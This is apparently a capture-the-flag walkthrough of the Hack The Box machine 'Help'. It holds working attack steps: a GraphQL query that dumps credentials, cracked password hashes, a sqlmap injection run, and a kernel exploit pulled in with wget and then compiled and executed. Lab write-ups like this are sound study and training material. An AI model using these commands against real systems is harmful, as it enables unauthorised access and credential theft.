1 minute read

Help

Reconnaissance

IP: 10.10.10.121

NMAP

nmap -T4 -p- -A 10.10.10.121
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-05 07:52 UTC
Nmap scan report for help.htb (10.10.10.121)
Host is up (0.031s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp   open  http    Apache httpd 2.4.18
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Device type: general purpose|router
Running: Linux 5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   29.94 ms 10.10.14.1
2   30.39 ms help.htb (10.10.10.121)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.48 seconds

add to /etc/hosts help.htb

Website

Site

ffuf found /support and /javascript (no permission to view)

In README.md we can spot version 1.0.2

found 2 file upload exploit 1 didn’t work for me and in second we must be authenticated https://www.exploit-db.com/exploits/41200 So let’s skip it for now and search other vectors.

port 3000

on port 3000 we have information

Hi Shiv, To get access please find the credentials with given query

Getting hint that directory is graphql

http://10.10.10.121:3000/graphql

Searching for query missing in GET request of graphql i found this post https://x.com/coffeetocode/status/1047598473871163393

pasting this in we got a lot of date

we can easyli spot User query with fileds username and password So we can navigate to this field with query parameter in url

http://10.10.10.121:3000/graphql?query={user%20{username,password}%20}

helpme@helpme.com
5d3c93182bb20f07b994a7f617e99cff

password is encoded, used crackstation to decode and I got password

godhelpmeplz

now we can login to help.htb/support

https://www.exploit-db.com/exploits/41200 Exploit doesn’t works so let’s try to do it manual

as poc in exploit says when we attempt do download file from ticket it have sqlinjection:

Save request and run sqlmap

sqlmap -r request --level 5 --risk 3 -p param[] 

and we got user support@mysite.com d318f44739dced66793b1a603028133a76ae680e (Welcome1)

Privilege Escalation

4.4.0-116-generic https://www.exploit-db.com/exploits/44298

now get exploit on the box compile and run

wget http://10.10.14.8/44298.c
gcc 44298.c -o exploit
./exploit